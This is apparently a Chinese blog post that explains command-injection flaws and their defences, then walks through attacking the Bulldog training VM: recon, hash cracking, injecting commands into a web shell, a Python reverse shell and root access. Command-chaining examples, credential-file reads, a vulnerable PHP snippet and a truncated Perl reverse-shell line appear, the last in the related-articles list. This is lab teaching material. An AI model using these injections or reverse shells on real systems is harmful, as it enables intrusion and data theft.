命令执行漏洞及Bulldog靶机实战

最新推荐文章于 2024-05-30 16:29:19 发布
最新推荐文章于 2024-05-30 16:29:19 发布
阅读量771 收藏 3
点赞数 2
文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40482449/article/details/109342408
版权
一、命令执行产生的原因

命令执行漏洞是指应用有时需要调用一些系统命令函数,如:system()、exec()、shell_exec()、eval()、passthru(),代码未对用户可控参数做过滤,当用户控制这些函数参数时,键可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。

二、分类
1、代码层过滤不严

商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数调用
system("/bin/program --arg$arg");

2、系统的漏洞造成命令注入

bash破壳漏洞(CVE-2014-6271)

3、调用第三方组件存在代码执行漏洞

WordPress中用来处理图片的Image Magick组件;
JAVA中命令执行漏洞(Struts/ElasticsearchGroovy等);
ThinkPHP命令执行;

三、利用条件

1、应用调用执行命令的函数;
2、将用户输入作为系统命令的参数拼接到命令中;
3、没有对用户输入过滤或者过滤不严;

四、 常见连接符及常见命令
1、常见连接符

(1)A;B 先执行A,再执行B;calc
(2)A&B 简单制约,A B之间无约束关系;
(3)A|B 显示B的执行结果;
(4)A&&B A执行成功,然后才会执行B;
(5)A||B A执行失败,才会执行B;

2、常见命令

(1)windows中:
ipconfig;arp -a;calc(计算器);regedit(注册表);netstat -ano;
(2)linux中:
cat /etc/passwd;(存放所有用户,密码)
id;(当前用户的id值)
groups;(用户所属组)
cat /etc/group;
whoami;
pwd;
uname -a;(查系统版本)
netstat -pantu;(查端口)
netstat -nr;(查网关及路由)

五、php中的危险函数

system:成功则返回命令输出的最后一行,失败则返回false;
exec:命令执行结果的最后一行内容;
shell_exec:命令执行的输出,如果执行过程中发生错误或者进程不产生输出,则返回null;
passthru:执行外部程序并且显示原始输出;
eval:将输入的字符串参数当做php程序代码执行;

六、危害

1、继承web服务的权限去执行系统命令的读写文件;
2、反弹shell;
3、控制整个网络或者服务器;
4、进一步内网渗透;

七、防御

1、尽量少使用执行命令的函数或者禁用;
2、参数值尽量使用引号包括,并在拼接前调用addslashes函数进行转义;
3、在使用动态函数之前,确保使用的函数是指定的函数之一;
4、在进行执行命令函数方法之前,对参数进行过滤,对敏感字符进行转义
5、对可控点是程序参数都情况下,使用escapeshellcmd函数进行过滤,对可控点是程序参数值的情况下,使用escapshellarg函数进行过滤;

八、BullDog实战

hack:kali(192.168.137.4)
靶机:BullDog(192.168.137.133)
1、主机发现
在这里插入图片描述
或者使用netdiscover -i eth0 -r 192.168.137.0/24
2、端口扫描
在这里插入图片描述
3、使用端口对应服务扫描
在这里插入图片描述
4、whatweb http://IP(判断网站指纹信息)
在这里插入图片描述
5、dirb http://IP(扫描网站目录,默认使用普通字典) (dpkg -L dirb 查找字典)
在这里插入图片描述
6、登录http://192.168.137.133/dev,查看源码得知
在这里插入图片描述
7、使用ND5解密
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
8、使用破解的用户名密码尝试登录(登录成功,权限不够)
在这里插入图片描述
9、在http://192.168.137.133/dev,发现web_shell
在这里插入图片描述
10、点击进入,查看是否存在命令执行漏洞,用拼接符尝试(存在命令执行漏洞,可以写反弹shell)
在这里插入图片描述
在这里插入图片描述
11、使用python脚本反弹shell,放到kali的网页目录下/var/www/html下命名为shell.py
在这里插入图片描述
12、将shell写入靶机的服务器上
在这里插入图片描述
在这里插入图片描述
13、执行shell,在kali上监听
在这里插入图片描述
在这里插入图片描述
14、提权
在这里插入图片描述
判断出这可能是密码:
SUPERultimatePASSWORDyouCANTget
15、输入python -c ‘import pty; pty.spawn("/bin/bash")’,使用root权限执行,前面加sudo

经验之谈:
1.Msfconsole中的ssh爆破模块使用
2. 源码中找到用户账号密码,登陆后的命令执行,可下载并汇总行反弹shell的脚本
3. 查找时注意home目录下,查看某些文件用cat时是乱码,可以考虑用strings去查看,那可能是程序字符串。
4. 一般反弹的shell不如终端,所以一般拿到后都是先利用python弹一个伪终端出来。

随风6034
关注
命令执行漏洞概念_命令执行漏洞超详细讲解
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-24 2180
一、命令执行漏洞概念什么是命令执行漏洞命令执行漏洞就是服务器端没有对客户端用户输入的命令进行过滤,导致用户可以通过任意拼接系统命令,使服务器端成功执行任意系统命令。为什么客户端能直接对服务器执行命令呢,因为在服务器安装的web程序,web框架和web组件等外部程序有时候去需要调用执行命令的函数,所以如果没有对客户端用户输入的命令进行过滤,就会使得用户通过外部程序直接编写和执行系统的命令函数。 二、命令执行漏洞原理。命令执行漏洞主要是服务端没有对执行命令的函数做出过滤导致的。我们可通过编写一些系统函数来输入
渗透测试实战3——bulldog2靶机入侵
浅浅的博客
04-25 1007
一、实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150、(192.168.247.151) 开始之前,需先登录bulldog2。账号:dirty,密码:pass,并使其获取IP 二、实验步骤 (一)主动信息收集 1、扫描存活主机 2、扫描开放端口(192.168.247.150和192.168.247.151开...
命令执行漏洞,详解。
m0_63028223的博客
04-30 1898
介绍漏洞:应用程序有时需要调用一些执行函数,如php中,使用system,exec,shell_exec,pasthur,popen,proc,proc_popen等函数可以执行系统命令,当黑客操控这些函数时,就可以将可以命令拼接在正常命令中,从而造成执行命令攻击。 下列以dvwa靶场为例进行介绍。 windows系统管道符命令; ”|“:直接执行后边的语句。 例如:ping 127.0.0.1|whoami "||":如果前边的执行语句为假则执行后边的语句,前边语句只能为假。 例如:ping
命令执行—代码执行漏洞分析与实战
qidiandexiaowu
09-13 1512
目录命令执行漏洞代码执行漏洞 命令执行漏洞 定义:服务器端没有对用户提交的命令进行严格的过滤,而当用户可以控制命令执行函数里的参数时,便可以将恶意系统命令当成正常系统命令执行,从而形成系统攻击。 漏洞危害: 继承Web服务程序的权限去执行系统命令或读写文件 反弹shell 控制整个网站甚至控制服务器 进一步内网渗透 PHP中的危险函数: system:成功则返回命令输出的最后一行,失败则返回FALSE。 exec:命令执行结果的最后一行内容。 shell_exec:命令执行的输出。如果执行过程中发生错误或者
安全漏洞从原理到实战--命令执行漏洞
qq_35254085的博客
08-03 357
一、命令执行漏洞简介 命令执行漏洞就是黑客可以直接在web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。 命令执行漏洞成因 命令执行漏洞形成的原因是web服务器对用户输入的命令安全监测不足,导致恶意代码被执行命令执行漏洞分类 系统命令执行漏洞:传入系统命令 PHP代码执行漏洞:传入PHP代码 系统命令执行函数 1、system 含义 执行外部程序,并且显示输出 (2)语法 system ( string KaTeX parse error: Expected 'EOF', got '&am
命令执行漏洞——系统命令执行
weixin_54055099的博客
09-17 951
命令执行漏洞之系统执行命令基础操作
靶机渗透测试实战(三)——Bulldog1渗透实战
橘子女侠
05-09 3752
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息收集——端口扫描 ...
靶机渗透测试实战(四)——Bulldog2渗透实战
橘子女侠
05-10 3036
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)渗透测试 四. 实验总结 一. 实验环境 靶机Bulldog2 IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息...
靶机实战(bulldog2)
weixin_45605313的博客
05-28 636
bulldog2实验环境实验过程信息收集1.主机发现2.端口扫描3.目录扫描4.漏洞发现漏洞利用提权总结 实验环境 靶机:bulldog2 测试机:kali,win10 实验过程 信息收集 1.主机发现 靶机IP:192.168.238.149 2.端口扫描 只有80 端口 扫描服务,http开启的方法 3.目录扫描 没有什么有用的东西 4.漏洞发现 可以用searchsploit搜下nginx漏洞 页面发现登录和注册地址,尝试弱口令,爆破,万能密码,逻辑漏洞等 注册页面被限制 审查元素看一
渗透测试实战2——bulldog1靶机入侵
浅浅的博客
04-25 997
一、实验环境 攻击机(Kali):192.168.247.160 靶机bulldog1):192.168.247.148 二、实验步骤 (一)主动信息收集 1、主机发现 2、端口扫描 3、端口服务版本扫描 (二)Web渗透 http服务(80端口) 1、访问目标主机 没有发现什么有用信息。 2、网站指纹信息扫描(whatweb) ...
安全测试之命令执行漏洞【建议收藏】
HSS919的博客
03-16 265
什么是文件包含漏洞程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 如果要使用远程包含功能,首先需要确定PHP是否已经开启远程包含功能选项(php默认关闭远程包含功能:allow_url_include=off),开启远程包含功能需要在php.ini配置文件中修改。 远程包含与本地包含没有区别,无非是支持远程加载,更容易getshell,无论是哪种扩展名,只要遵循PHP语法规范,PHP解析器就会对其解析。
渗透测试命令执行漏洞
Zane·S的博客
05-06 1010
介绍命令执行漏洞 应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常的命令中,从而造成命令执行攻击,这就是命令执行漏洞命令执行漏洞的利用 Windows系统常用管道符: 管道符 含义 ...
命令执行漏洞
最新发布
大河之犬的博客
05-30 973
命令执行漏洞(RCE)是一种常见的Web安全漏洞,它允许攻击者在受害者服务器上执行未经授权的命令。这种漏洞通常出现在Web应用程序中,当用户输入的内容被直接用来构造系统命令执行时,如果没有适当的输入验证和过滤,就可能导致命令注入。漏洞危害获取服务器权限获取敏感数据文件写入恶意文件getshell植入木马病毒勒索软件。
web靶机系列-命令执行
rlenew的博客
05-28 630
主机地址:192.168.136.133 目标地址:192.168.136.135 先用nmap搜查: 然后用nitko工具查找网站的信息,看到有敏感文件泄露: 登陆网站并访问/test.jsp,看到界面有提醒用“ls -l /tmp”查看文件 当输入命令后,得到响应则可以认定为命令执行漏洞 查看home目录,挖掘用户信息 ls -alh /home/ 查看具体用户的目录: ls -alh /home/用户名/,发现用户有ssh服务 查看系统消息:uname -a 查看bill用户 sudo命令
bulldog漏洞利用
xxxMIng的博客
12-28 341
逐个去破解   发现之后的密码是 sarah:bulldoglover nick:bulldog 登录 成功之后 访问如下页面 刷新一下   use Socket;$i="192.168.232.131";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(conne...
漏洞复现】6.Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现与分析
Zichel77的博客
03-21 1474
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
命令执行靶场实战
qq_23347209的博客
05-31 638
文章目录环境准备一、信息搜集1、nmap扫描2、使用nikto扫描网站目录二、漏洞利用测试三、nc反弹shell 环境准备 靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/ 使用Vmware虚拟机中NAT网络 靶机: 192.168.146.153 攻击机 parrot 192.168.146.129 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 1、nmap扫描 -A全面扫描 -p-全端口扫描 nmap -A -p- 192.168
Windows命令执行漏洞利用技巧
一米八多的瑞兹的博客
02-22 827
Windows命令执行漏洞利用技巧 1. 命令执行示例代码分析 以下使用PHP代码,对指定目标执行Ping命令。 <?php echo “<pre>”; $arg = $_GET['cmd']; if ($arg) { system("ping $arg"); } echo “</pre>”; ?> 2. 命令执行漏洞利用思路 代码中拼接用户的输入并代码system函数执行,但是无法直接执行用户的自定义命令。 思
Python操作MySQL数据库:cursor游标详解与渗透测试思路
- 创建游标:连接成功后,创建一个游标对象,游标用于执行SQL命令并返回结果集。通常使用`cursor = connection.cursor()`。 - 执行SQL:使用游标的`execute()`方法执行SQL语句,如`cursor.execute("SELECT * FROM ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值